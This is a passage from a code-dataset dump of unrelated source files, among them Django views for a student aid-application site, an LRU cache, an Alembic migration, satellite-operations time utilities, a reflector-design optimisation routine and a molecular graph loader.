Инструкцию по активации Вы получите в письме.')\n return HttpResponseRedirect( '/mainpage/' )\n\n context = {'form': form, 'error': error }\n return render_to_response('registration.html',context_instance=RequestContext(request, context))\n\n@login_required\ndef change_user_data(request):\n error = list()\n try:\n user = request.user\n except ObjectDoesNotExist:\n error.append(u'Невозможно установить пользователя')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n try:\n profile = Users.objects.get(user = user)\n except ObjectDoesNotExist:\n error.append(u'Невозможно загрузить данные профиля')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n data = {\n 'first_name' : user.first_name,\n 'last_name' : user.last_name,\n 'father_name': profile.father_name,\n 'facultet' : profile.facultet,\n 'program' : profile.program,\n 'birthday' : profile.birthday,\n 'course' : profile.course,\n 'phonenumber': profile.phonenumber,\n 'adress' : profile.adress\n }\n form = UserChangeForm(request.POST or data)\n\n if request.method == 'POST' and form.is_valid():\n user.first_name = form.cleaned_data.get('first_name', None)\n user.last_name = form.cleaned_data.get('last_name', None)\n profile.father_name = form.cleaned_data.get('father_name', None)\n profile.facultet = form.cleaned_data.get('facultet', None)\n profile.program = form.cleaned_data.get('program', None)\n profile.birthday = form.cleaned_data.get('birthday',None)\n profile.course = form.cleaned_data.get('course',None)\n profile.phonenumber = form.cleaned_data.get('phonenumber',None)\n profile.adress = form.cleaned_data.get('adress',None)\n user.save()\n profile.save()\n messages.success(request, u'Данные успешно обновлены')\n return HttpResponseRedirect( '/mainpage/' )\n context = {'form': form}\n return render_to_response('changeuserdata.html',context_instance=RequestContext(request, context))\n\n@login_required\ndef create_order(request, typeorder):\n error = list()\n try:\n user = request.user\n user_full = Users.objects.get(user = user)\n except ObjectDoesNotExist:\n error.append(u'Невозможно установить пользователя')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n try:\n type_order = OrderType.objects.get(name = typeorder)\n except ObjectDoesNotExist:\n error.append(u'Невозможно установить тип заявления')\n context = {'error': error}\n return render_to_response ('404.html',context_instance=RequestContext(request,context))\n today = datetime.today()\n #exception -- > период подачи зая��лений не наступил\n try:\n date_interval = OrderDateInterval.objects.get(first_date__lte = today, last_date__gte = today, order_type = type_order )\n except ObjectDoesNotExist:\n messages.warning(request, u'На данный момент регистрация не открыта')\n return HttpResponseRedirect( '/mainpage/' )\n try:\n Order.objects.get(user = user, order_date_interval = date_interval, order_type = type_order)\n except ObjectDoesNotExist:\n try:\n form = CreateOrderForm(typeorder, date_interval.mandat.name, request.POST or None)\n except:\n error.append(u'Невозможно сформировать форму')\n context = {'error': error}\n return render_to_response ('404.html',context_instance=RequestContext(request,context))\n if request.method == 'POST' and form.is_valid():\n m = Order()\n m.user = user\n try:\n m.askable_money = 0 if form.cleaned_data.get('askable_money') is None else 
int(form.cleaned_data.get('askable_money'))\n except:\n error.append(u'Невозможно установить запрашиваемую Вами сумму')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n try:\n m.description = form.cleaned_data.get('description')\n m.documents = form.cleaned_data.get('documents')\n except:\n error.append(u'Не удается получить некотрые данные.(documents, description)')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n try:\n s = OrderStatus.objects.get(name = u'Зарегистрированно на сайте')\n except ObjectDoesNotExist:\n error.append(u'Невозможно найти таблицу статусов для матпомощи')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n m.creation_date = today\n m.order_date_interval = date_interval \n m.status = s\n m.first_name = user.first_name\n m.last_name = user.last_name\n m.father_name = user_full.father_name\n m.facultet = user_full.facultet\n m.program = user_full.program\n m.birthday = user_full.birthday\n m.course = user_full.course\n m.phonenumber = user_full.phonenumber\n m.adress = user_full.adress\n m.order_type = type_order\n m.save()\n for r in form.cleaned_data.get('reason',None):\n try:\n reason = OrderReason.objects.get(id = int(r), order_type = type_order)\n except:\n error.append(u'Невозможно установить льготные категории')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n m.reason.add(reason)\n m.replyable_money = False\n m.save()\n messages.success(request, u'Поздравляем, заявление подано!')\n return HttpResponseRedirect( '/mainpage/' )\n reasonwithaskable = ','.join([str(i.id) for i in OrderReason.objects.all().filter(with_askable = True, active = True, order_type = type_order)])\n context = {'form' : form, 'reasonwithaskable': reasonwithaskable, 'typeorder': typeorder}\n return render_to_response('create_order.html', context_instance = RequestContext(request,context))\n messages.warning(request, u'Вы уже подали заявление')\n return HttpResponseRedirect( '/mainpage/' )\n\n@login_required\ndef delete_order(request, typeorder):\n error = list()\n today = datetime.today()\n try:\n user = request.user\n except ObjectDoesNotExist:\n error.append(u'Невозможно установить пользователя')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n try:\n type_order = OrderType.objects.get(name = typeorder)\n except ObjectDoesNotExist:\n error.append(u'Невозможно установить тип заявления')\n context = {'error': error}\n return render_to_response ('404.html',context_instance=RequestContext(request,context))\n try:\n status = OrderStatus.objects.get(name = u'Зарегистрированно на сайте')\n except ObjectDoesNotExist:\n error.append(u'Невозможно найти таблицу статусов для матпомощи')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n try:\n date_interval = OrderDateInterval.objects.get(first_date__lte = today, last_date__gte = today, order_type = type_order )\n except ObjectDoesNotExist:\n messages.warning(request, u'На данный момент регистрация не открыта')\n return HttpResponseRedirect( '/mainpage/' )\n try:\n order = Order.objects.get(user = user, order_date_interval = date_interval, status = status, order_type = type_order)\n except ObjectDoesNotExist:\n 
messages.warning(request, u'Не удается найти Ваше заявление.')\n return HttpResponseRedirect( '/mainpage/')\n try:\n order.delete()\n except:\n messages.warning(request, u'Не удается удалить Ваше заявление')\n return HttpResponseRedirect('/mainpage')\n messages.success(request, u'Ваше заявление удалено!')\n return HttpResponseRedirect('/mainpage')\n\n@login_required\ndef print_order(request, typeorder):\n error = list()\n today = datetime.today()\n try:\n user = request.user\n except ObjectDoesNotExist:\n error.append(u'Невозможно установить пользователя')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n try:\n type_order = OrderType.objects.get(name = typeorder)\n except ObjectDoesNotExist:\n error.append(u'Невозможно установить тип заявления')\n context = {'error': error}\n return render_to_response ('404.html',context_instance=RequestContext(request,context))\n try:\n date_interval = OrderDateInterval.objects.get(first_date__lte = today, last_date__gte = today, order_type = type_order)\n except ObjectDoesNotExist:\n messages.warning(request, u'На данный момент регистрация не открыта')\n return HttpResponseRedirect( '/mainpage/' )\n try:\n order = Order.objects.get(user = user, order_date_interval = date_interval )\n except ObjectDoesNotExist:\n messages.warning(request, u'Не удается найти Ваше заявление.')\n return HttpResponseRedirect( '/mainpage/')\n from myscripts import Report\n r = Report()\n return r.pdf(user.email, order, today, typeorder)\n\n@login_required\ndef admin_main_page(request):\n error = list()\n try:\n user = request.user\n except ObjectDoesNotExist:\n error.append(u'Невозможно установить пользователя')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n try:\n admin = Admins.objects.get(user = user)\n except ObjectDoesNotExist:\n error.append(u'У Вас нет прав для доступа!')\n context = {'error':error}\n return render_to_response('404.html',context_instance=RequestContext(request,context))\n form = BarcodeForm(request.POST or None)\n if request.method == 'POST' and form.is_valid():\n data = form.cleaned_data.get('barcode', None)\n ord_id, ord_type = data.split('$')\n try:\n order = Order.objects.get(id = ord_id)\n except ObjectDoesNotExist:\n form._errors['barcode'] = form.error_class([u'Такого заявления нет'])\n form.cleaned_data['barcode'] = ''\n context = {'form': form}\n return render_to_response('admin_main_page.html', context_instance = RequestContext(request,context))\n if order.facultet in admin.facultet.all() and order.order_type in admin.order_type.all():\n context = {'order': order}\n return render_to_response('admin_order_data.html', context_instance = RequestContext(request,context))\n else:\n form._errors['barcode'] = form.error_class([u'У Вас нет возможности посмотреть данное заявление'])\n form.cleaned_data['barcode'] = ''\n context = {'form': form}\n return render_to_response('admin_main_page.html', context_instance = RequestContext(request,context))\n\n\n\n\n","sub_path":"studenthelp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"516202405","text":"# Get the projected total sales.\r\n# September 20, 2019\r\n# CTI-110 P2T1 - Sales Prediction\r\n# Steve Jones\r\n\r\ntotal_sales = float(input('Enter the projected sales: '))\r\n\r\n# Calculate the profit as 23 percent of total 
sales.\r\nprofit = total_sales * 0.23\r\n\r\n# Display the profit.\r\nprint('The profit is $', profit)\r\n","sub_path":"P2T1_SalesPrediction_SteveJones.py","file_name":"P2T1_SalesPrediction_SteveJones.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"375368349","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport glob\nimport numpy as np\nimport cv2 as cv\n\ndef save_img(dname, fn, i, frame_visible, frame_lwir):\n setName = os.path.basename(dname)\n vidName = os.path.basename(fn).split('_')[1].split('.')[0] \n imgDir = out_dir + '/' + setName\n\n cv.imwrite('{}/{}_{}_{:06d}.png'.format(\n imgDir, setName, vidName, i), np.concatenate((frame_visible, frame_lwir), axis=2))\n\nout_dir = 'data/kaist/images'\nif not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\nfor dname in sorted(glob.glob('data/kaist/videos/set*')):\n visible_seq = sorted(glob.glob('{}/Visible_*.seq'.format(dname)))\n lwir_seq = sorted(glob.glob('{}/LWIR_*.seq'.format(dname)))\n\n for fn in zip(visible_seq, lwir_seq):\n visible = cv.VideoCapture(fn[0])\n lwir = cv.VideoCapture(fn[1])\n i = 0\n while True:\n ret1, frame_visible = visible.read()\n ret2, frame_lwir = lwir.read()\n\n assert ret1 == ret2\n\n if not ret1:\n break\n save_img(dname, fn[0], i, frame_visible, frame_lwir)\n i += 1\n print(fn)\n","sub_path":"scripts/convert_seqs_kaist.py","file_name":"convert_seqs_kaist.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"51212689","text":"from doubly_linked_list import DoublyLinkedList\nfrom doubly_linked_list import DoublyLinkedList\n\n\nclass LRUCache:\n def __init__(self, limit=10):\n self.limit = limit\n self.list = DoublyLinkedList()\n self.dict = {}\n\n \"\"\"\n Retrieves the value associated with the given key. Also\n needs to move the key-value pair to the top of the order\n such that the pair is considered most-recently used.\n Returns the value associated with the key or None if the\n key-value pair doesn't exist in the cache. \n \"\"\"\n\n def get(self, key):\n catch = self.dict.get(key)\n if catch != None:\n self.list.move_to_front(catch)\n return catch.value\n else:\n return catch\n \"\"\"\n Adds the given key-value pair to the cache. The newly-\n added pair should be considered the most-recently used\n entry in the cache. If the cache is already at max capacity\n before this entry is added, then the oldest entry in the\n cache needs to be removed to make room. Additionally, in the\n case that the key already exists in the cache, we simply \n want to overwrite the old value associated with the key with\n the newly-specified value. 
\n \"\"\"\n\n def set(self, key, value):\n node = self.list.add_to_head(value)\n\n if self.dict.get(key) == None:\n self.dict[key] = node\n if self.list.length > self.limit:\n for k, v in self.dict.items():\n if v == self.list.tail:\n del self.dict[k]\n self.list.remove_from_tail()\n break\n else:\n self.dict[key].delete()\n self.dict[key] = node\n self.list.length -= 1\n\n return node\n","sub_path":"lru_cache/lru_cache.py","file_name":"lru_cache.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"287023490","text":"\"\"\"empty message\n\nRevision ID: 7a2f8d6f27fc\nRevises: 0158f7c00beb\nCreate Date: 2021-02-23 14:49:09.917838\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '7a2f8d6f27fc'\ndown_revision = '0158f7c00beb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('systems', sa.Column('cloud_provider', sa.String(length=25), nullable=True))\n op.add_column('systems', sa.Column('display_name', sa.String(length=100), nullable=True))\n op.add_column('systems', sa.Column('fqdn', sa.String(length=100), nullable=True))\n op.add_column('systems', sa.Column('instance_type', sa.String(length=25), nullable=True))\n op.add_column('systems', sa.Column('state', sa.String(length=25), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('systems', 'state')\n op.drop_column('systems', 'instance_type')\n op.drop_column('systems', 'fqdn')\n op.drop_column('systems', 'display_name')\n op.drop_column('systems', 'cloud_provider')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/7a2f8d6f27fc_.py","file_name":"7a2f8d6f27fc_.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"561197997","text":"################################################################################\n\n\"\"\"\n(c) SES-ASTRA 2008\n\nPACKAGE \n spell.utils.ttime\nFILE\n ttime.py\n \nDESCRIPTION\n Time management utilities\n \nCOPYRIGHT\n This software is the copyrighted work of SES ASTRA S.A.\n All rights reserved.\n \nPROJECT\n UGCS/USL\n \nAUTHOR\n Rafael Chinchilla Camara (GMV) & Fabien Bouleau (SES Engineering)\n\"\"\"\n\n################################################################################\n\n#*******************************************************************************\n# SPELL Imports\n#*******************************************************************************\n\n#*******************************************************************************\n# Local Imports\n#*******************************************************************************\n \n#*******************************************************************************\n# System Imports\n#*******************************************************************************\nimport datetime\nimport time\nfrom spell.lib.exception import DriverException\n \n#*******************************************************************************\n# Exceptions \n#*******************************************************************************\n \n#*******************************************************************************\n# Module 
globals\n#*******************************************************************************\n\n# The date/time formats accepted are:\n#\n# For absolute time:\n# \n# * dd-mmm-yyyy [hh:mm[:ss]]\n# * yyyy-mm-dd [hh:mm[:ss]]\n# * dd/mm/yyyy [hh:mm[:ss]]\n# * dd-mm-yyyy [hh:mm[:ss]]\n# \n# * dd-mmm-yyyy:hh:mm[:ss]\n# * yyyy-mm-dd:hh:mm[:ss]\n# * dd/mm/yyyy:hh:mm[:ss]\n# * dd-mm-yyyy:hh:mm[:ss]\n# \n# For relative times:\n# \n# * +ss.nnn or -ss.nnn\n# * +ddd hh:mm[:ss] or -ddd hh:mm[:ss]\n\n__all__ = ['TIME','NOW','TODAY','YESTERDAY','TOMORROW','DAY','HOUR','MINUTE','SECOND']\n\nNOW_STR = 'NOW'\nYESTERDAY_STR = 'YESTERDAY'\nTODAY_STR = 'TODAY'\nTOMORROW_STR = 'TOMORROW'\n\n################################################################################\nclass TIME(object):\n #===========================================================================\n def __init__(self, timestamp):\n ttime = ttime_class()\n self._val = None\n \n if isinstance(timestamp, TIME):\n if isinstance(timestamp._val, str):\n self._val = ttime.cnv(timestamp._val)\n else:\n self._val = timestamp._val\n elif isinstance(timestamp, datetime.datetime) or isinstance(timestamp, datetime.timedelta):\n self._val = timestamp\n elif isinstance(timestamp, str):\n if timestamp in (NOW_STR, TODAY_STR, YESTERDAY_STR, TOMORROW_STR):\n self._val = timestamp\n else:\n self._val = ttime.cnv(timestamp)\n else:\n self._val = ttime.cnv(timestamp)\n if self._val is None:\n raise DriverException(\"Invalid input for date/time: \" + repr(timestamp))\n \n #===========================================================================\n def value(self):\n ttime = ttime_class()\n \n if isinstance(self._val, str):\n return ttime.cnv(self._val)\n else:\n return self._val\n \n #===========================================================================\n def abs(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n val = datetime.datetime.utcnow() + val\n return time.mktime(val.timetuple())\n \n #===========================================================================\n def rel(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n return val.days * 3600 * 24 + val.seconds + val.microseconds / 1000000 \n return None\n \n #===========================================================================\n def isAbs(self):\n val = self.value()\n if isinstance(val, datetime.datetime):\n return True\n return False\n \n #===========================================================================\n def isRel(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n return True\n return False\n \n #===========================================================================\n def julianDay(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n return None\n return val.timetuple()[7]\n \n #===========================================================================\n def year(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n return None\n return val.year\n \n #===========================================================================\n def month(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n return None\n return val.month\n \n #===========================================================================\n def day(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n return None\n return val.day\n \n #===========================================================================\n def hour(self):\n val = self.value()\n if isinstance(val, 
datetime.timedelta):\n return None\n return val.hour\n \n #===========================================================================\n def minute(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n return None\n return val.minute\n \n #===========================================================================\n def second(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n return None\n return val.second\n \n #===========================================================================\n def __str__(self):\n val = self.value()\n res = None\n if isinstance(val, datetime.datetime):\n res = val.strftime('%d-%b-%Y %H:%M:%S')\n if val.microsecond != 0: res = res + \".%06i\" % val.microsecond\n elif isinstance(val, datetime.timedelta):\n res = ('%+04i %02i:%02i:%02i' \n % (val.days, val.seconds // 3600, \n val.seconds // 60 % 60, val.seconds % 60))\n if val.microseconds != 0: res = res + \".%06i\" % val.microseconds\n return res\n \n #===========================================================================\n def __translate(self, timestamp):\n if isinstance(timestamp, TIME):\n return timestamp\n else:\n return TIME(timestamp)\n \n #===========================================================================\n def __cmp__(self, other):\n ttime = self.__translate(other)\n val = self.value()\n val2 = ttime.value()\n \n if isinstance(val,datetime.timedelta) and isinstance(val2,datetime.datetime):\n return -1\n if isinstance(val,datetime.datetime) and isinstance(val2,datetime.timedelta):\n return 1\n \n if (val2 == val):\n return 0\n elif (val < val2):\n return -1\n elif (val > val2):\n return 1\n \n #===========================================================================\n def __add__(self, timestamp):\n return TIME(self.value() + self.__translate(timestamp).value())\n\n #===========================================================================\n def __sub__(self, timestamp):\n return TIME(self.value() - self.__translate(timestamp).value())\n\n #===========================================================================\n def __mul__(self, coef):\n return TIME(self.value() * coef)\n\n #===========================================================================\n def __radd__(self, timestamp):\n return TIME(self.value() + self.__translate(timestamp).value())\n\n #===========================================================================\n def __rsub__(self, timestamp):\n return TIME(self.value() - self.__translate(timestamp).value())\n\n #===========================================================================\n def __rmul__(self, coef):\n return TIME(self.value() * int(coef))\n\n################################################################################\nclass ttime_class(object):\n\n __isinitialized = False\n __instance = None\n \n #===========================================================================\n def __new__(cls):\n if not isinstance(ttime_class.__instance, cls):\n ttime_class.__instance = object.__new__(cls) \n return ttime_class.__instance\n\n #===========================================================================\n def __init__(self):\n if self.__isinitialized:\n return\n super(ttime_class, self).__init__()\n self.__isinitialized = True\n \n #===========================================================================\n def cnv(self, timestamp):\n \n mydt = datetime.datetime(1,1,1)\n evaluated = False\n\n datefmtlist = [ \n '%Y-%j-%H:%M:%S', '%Y-%j-%H:%M', '%Y-%j',\n '%Y-%j %H:%M:%S', '%Y-%j %H:%M', '%Y-%j',\n '%d-%b-%Y 
%H:%M:%S', '%d-%b-%Y %H:%M', '%d-%b-%Y',\n '%Y-%m-%d %H:%M:%S', '%Y-%m-%d %H:%M', '%Y-%m-%d',\n '%Y/%m/%d %H:%M:%S', '%Y/%m/%d %H:%M', '%Y/%m/%d',\n '%d/%m/%Y %H:%M:%S', '%d/%m/%Y %H:%M', '%d/%m/%Y',\n '%d-%m-%Y %H:%M:%S', '%d-%m-%Y %H:%M', '%d-%m-%Y',\n '%d-%b-%Y:%H:%M:%S', '%d-%b-%Y:%H:%M', '%d-%b-%Y',\n '%Y-%m-%d:%H:%M:%S', '%Y-%m-%d:%H:%M', '%Y-%m-%d',\n '%Y/%m/%d:%H:%M:%S', '%Y/%m/%d:%H:%M', '%Y/%m/%d',\n '%d/%m/%Y:%H:%M:%S', '%d/%m/%Y:%H:%M', '%d/%m/%Y',\n '%d-%m-%Y:%H:%M:%S', '%d-%m-%Y:%H:%M', '%d-%m-%Y',\n ]\n \n abshourfmtlist = [\n '%H:%M:%S', '%H:%M:%S', '%H:%M',\n ]\n\n # Split timestamp and microseconds\n\n ms = 0\n \n if isinstance(timestamp, float):\n ms = (timestamp - int(timestamp)) * 1000000\n elif isinstance(timestamp, str):\n items = timestamp.split('.')\n timestamp = items[0]\n if len(items) > 1: ms = int(items[1].ljust(6, '0'))\n\n # - ISO, European or OpenVMS date formats\n\n for fmt in datefmtlist:\n if not evaluated:\n try:\n val = mydt.strptime(timestamp, fmt)\n val = val.replace(microsecond = ms)\n evaluated = True\n except:\n pass\n \n # - or \n \n if not evaluated and (isinstance(timestamp, int) or isinstance(timestamp, float)):\n dd = int(timestamp / (3600 * 24)) \n hh = int(timestamp / 3600) % 24\n mm = int(timestamp / 60) % 60 \n ss = int(timestamp) % 60\n\n val = datetime.timedelta(days = dd, hours=hh, minutes=mm, seconds=ss, microseconds=ms)\n \n evaluated = True \n \n # +|-[dd] hh:mm[:ss]\n \n if not evaluated:\n try:\n tmp = timestamp\n if tmp[0] in ('+', '-'):\n # Capture the sign ('+' in '+dd hh:mm:ss') and remove it\n sign = 1\n if tmp[0] == '-':\n sign = -1\n tmp = tmp[1:]\n \n # Capture the day ('dd' in 'dd hh:mm:ss' if 'dd' exists)\n items = tmp.split(' ') \n mytime = items[0]\n dd = 0\n \n # In case we have '+hh:mm:ss' days = 0 and we go on with the time)\n if len(items) == 2:\n dd = eval(items[0].lstrip('0') or '0')\n mytime = items[1]\n \n # Capture the time ('hh' 'mm' and 'ss' in 'hh:mm:ss')\n items = mytime.split(':')\n hh = eval(items[0].lstrip('0') or '0')\n mm = eval(items[1].lstrip('0') or '0')\n ss = int(eval(items[2].lstrip('0') or '0'))\n \n # Normalize in case we have hours > 23\n # E.g. 
+2 26:00:00 becomes +3 02:00:00\n dd = dd + hh // 24\n hh = hh % 24\n\n # Apply the sign\n dd = dd * sign\n hh = hh * sign\n mm = mm * sign\n ss = ss * sign\n ms = ms * sign\n \n val = datetime.timedelta(days = dd, hours=hh, minutes=mm, seconds=ss, microseconds=ms)\n \n evaluated = True\n except:\n pass\n\n\n # Evaluated TODAY, NOW, YESTERDAY and TOMORROW\n \n if not evaluated:\n evaluated = True\n val = datetime.datetime.utcnow()\n if timestamp != NOW_STR:\n val = val.replace(hour=0, minute=0, second=0, microsecond=0)\n if timestamp == YESTERDAY_STR:\n val = val - datetime.timedelta(days = 1)\n elif timestamp == TOMORROW_STR:\n val = val + datetime.timedelta(days = 1)\n elif timestamp != TODAY_STR:\n evaluated = False\n \n # - hh:mm[:ss] is TODAY at hh:mm[:ss]\n\n for fmt in abshourfmtlist:\n if not evaluated:\n try:\n mydt = mydt.strptime(timestamp, fmt)\n val = datetime.datetime.utcnow()\n val = val.replace(hour=mydt.hour, minute=mydt.minute, \n second=mydt.second, microsecond=ms)\n evaluated = True\n except:\n pass\n \n if evaluated:\n return val\n\n return None\n\n#*******************************************************************************\n# SPELL Definitions\n#*******************************************************************************\n\nDAY = TIME('+1 00:00:00')\nHOUR = TIME('+01:00:00')\nMINUTE = TIME('+00:01:00')\nSECOND = TIME('+00:00:01')\n\nNOW = TIME(NOW_STR)\nTODAY = TIME(TODAY_STR)\nYESTERDAY = TIME(YESTERDAY_STR)\nTOMORROW = TIME(TOMORROW_STR)\n","sub_path":"spell/spell/utils/ttime.py","file_name":"ttime.py","file_ext":"py","file_size_in_byte":14782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"258912180","text":"from reflector_problem.point_source import compute_point_source_reflector\nfrom reflector_problem.raytracing.utils import to_angle\nimport torch\n\ndef design_reflector_gd(\n extended_source_target,\n extended_angular_support,\n initial_target,\n initial_angular_support,\n input_measure_vector,\n input_angular_support,\n raytracer,\n loss,\n optimizer,\n history,\n cost_normalization=True,\n n_steps=20,\n lr=1.,\n lr_multiplier=1.):\n history.save_vars(optimization = \"gradient_descent\")\n history.save_vars(raytracer = str(raytracer))\n history.save_vars(loss = str(loss))\n \n modified_target = initial_target.clone()\n modified_angular_support = initial_angular_support.clone()\n\n modified_target_log = modified_target.log(\n ) + modified_target.logsumexp(dim=-1, keepdim=False)\n modified_target_log.requires_grad_(True)\n optim = optimizer([modified_target_log],\n lr=lr)\n scheduler = torch.optim.lr_scheduler.MultiplicativeLR(optim, lr_lambda=lambda step:lr_multiplier)\n\n input_angular_support = input_angular_support.to(input_measure_vector.device)\n modified_target_log = modified_target_log.to(input_angular_support.device)\n modified_angular_support = modified_angular_support.to(input_angular_support.device)\n\n cost_normalizer = 1.\n \n if cost_normalization:\n sinkhorn_result = compute_point_source_reflector(\n input_measure_vector.view(-1).to(input_measure_vector.device),\n input_angular_support.view(-1, 1),\n modified_target_log.softmax(dim=-1).view(-1).to(input_measure_vector.device),\n modified_angular_support.view(-1, 1)\n )\n \n rays, weights = raytracer.raytrace_reflector(sinkhorn_result)\n cost_normalizer = loss(weights, to_angle(rays), extended_source_target, extended_angular_support)\n cost_normalizer = cost_normalizer.detach()\n\n for i in range(n_steps):\n optim.zero_grad()\n 
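# re-solve the point-source reflector (Sinkhorn) for the current target estimate,\n        # then re-raytrace it; the loss backpropagates into modified_target_log\n        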
sinkhorn_result = compute_point_source_reflector(\n input_measure_vector.view(-1).to(input_measure_vector.device),\n input_angular_support.view(-1, 1),\n modified_target_log.softmax(\n dim=-1).view(-1).to(input_measure_vector.device),\n modified_angular_support.view(-1, 1)\n )\n\n rays, weights = raytracer.raytrace_reflector(sinkhorn_result)\n\n cost = loss(weights, to_angle(rays),\n extended_source_target, extended_angular_support)\n cost = cost / cost_normalizer\n\n cost.backward()\n\n optim.step()\n\n history.save_step(i,\n modified_target=modified_target_log.softmax(dim=1).detach().cpu().clone(),\n modified_angular_support=modified_angular_support.detach().cpu().clone(),\n rays=rays.detach().cpu().clone(),\n weights=weights.detach().cpu().clone(),\n cost=cost.detach().cpu().clone(),\n lr=scheduler.get_lr())\n\n scheduler.step()\n\n\n return modified_target_log.softmax(dim=-1), modified_angular_support, history\n","sub_path":"reflector_problem/methods/gradient_descent.py","file_name":"gradient_descent.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"95723172","text":"import torch\nimport copy\nimport random\nimport networkx as nx\nimport numpy as np\nfrom torch_geometric.utils import convert\nfrom loader import graph_data_obj_to_nx_simple, nx_to_graph_data_obj_simple\n# from rdkit import Chem\n# from rdkit.Chem import AllChem\n# from loader import mol_to_graph_data_obj_simple, \\\n# graph_data_obj_to_mol_simple\n#\n# from loader import MoleculeDataset\n# import scipy.sparse as sparse\n# from scipy.sparse import linalg\n# import karateclub as kc\n# import torch.nn.functional as F\n# from karateclub.node_embedding.structural import graphwave\n# import sklearn.preprocessing as preprocessing\nfrom rdkit import Chem\nfrom torch_geometric.data import Data\n# from rdkit.Chem import Descriptors\n# from rdkit.Chem import AllChem\n# from rdkit import DataStructs\n# from rdkit.Chem.rdMolDescriptors import GetMorganFingerprintAsBitVect\nimport dgl\n\nallowable_features = {\n 'possible_atomic_num_list' : list(range(1, 119)),\n 'possible_formal_charge_list' : [-5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5],\n 'possible_chirality_list' : [\n Chem.rdchem.ChiralType.CHI_UNSPECIFIED,\n Chem.rdchem.ChiralType.CHI_TETRAHEDRAL_CW,\n Chem.rdchem.ChiralType.CHI_TETRAHEDRAL_CCW,\n Chem.rdchem.ChiralType.CHI_OTHER\n ],\n 'possible_hybridization_list' : [\n Chem.rdchem.HybridizationType.S,\n Chem.rdchem.HybridizationType.SP, Chem.rdchem.HybridizationType.SP2,\n Chem.rdchem.HybridizationType.SP3, Chem.rdchem.HybridizationType.SP3D,\n Chem.rdchem.HybridizationType.SP3D2, Chem.rdchem.HybridizationType.UNSPECIFIED\n ],\n 'possible_numH_list' : [0, 1, 2, 3, 4, 5, 6, 7, 8],\n 'possible_implicit_valence_list' : [0, 1, 2, 3, 4, 5, 6],\n 'possible_degree_list' : [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n 'possible_bonds' : [\n Chem.rdchem.BondType.SINGLE,\n Chem.rdchem.BondType.DOUBLE,\n Chem.rdchem.BondType.TRIPLE,\n Chem.rdchem.BondType.AROMATIC\n ],\n 'possible_bond_dirs' : [ # only for double bond stereo information\n Chem.rdchem.BondDir.NONE,\n Chem.rdchem.BondDir.ENDUPRIGHT,\n Chem.rdchem.BondDir.ENDDOWNRIGHT\n ]\n}\n\ndef mol_to_graph_data_obj_simple(mol):\n \"\"\"\n Converts rdkit mol object to graph Data object required by the pytorch\n geometric package. 
NB: Uses simplified atom and bond features, and represent\n as indices\n :param mol: rdkit mol object\n :return: graph data object with the attributes: x, edge_index, edge_attr\n \"\"\"\n # atoms\n num_atom_features = 2 # atom type, chirality tag\n atom_features_list = []\n for atom in mol.GetAtoms():\n atom_feature = [allowable_features['possible_atomic_num_list'].index(\n atom.GetAtomicNum())] + [allowable_features[\n 'possible_chirality_list'].index(atom.GetChiralTag())]\n atom_features_list.append(atom_feature)\n x = torch.tensor(np.array(atom_features_list), dtype=torch.long)\n\n # bonds\n num_bond_features = 2 # bond type, bond direction\n if len(mol.GetBonds()) > 0: # mol has bonds\n edges_list = []\n edge_features_list = []\n for bond in mol.GetBonds():\n i = bond.GetBeginAtomIdx()\n j = bond.GetEndAtomIdx()\n edge_feature = [allowable_features['possible_bonds'].index(\n bond.GetBondType())] + [allowable_features[\n 'possible_bond_dirs'].index(\n bond.GetBondDir())]\n edges_list.append((i, j))\n edge_features_list.append(edge_feature)\n edges_list.append((j, i))\n edge_features_list.append(edge_feature)\n\n # data.edge_index: Graph connectivity in COO format with shape [2, num_edges]\n 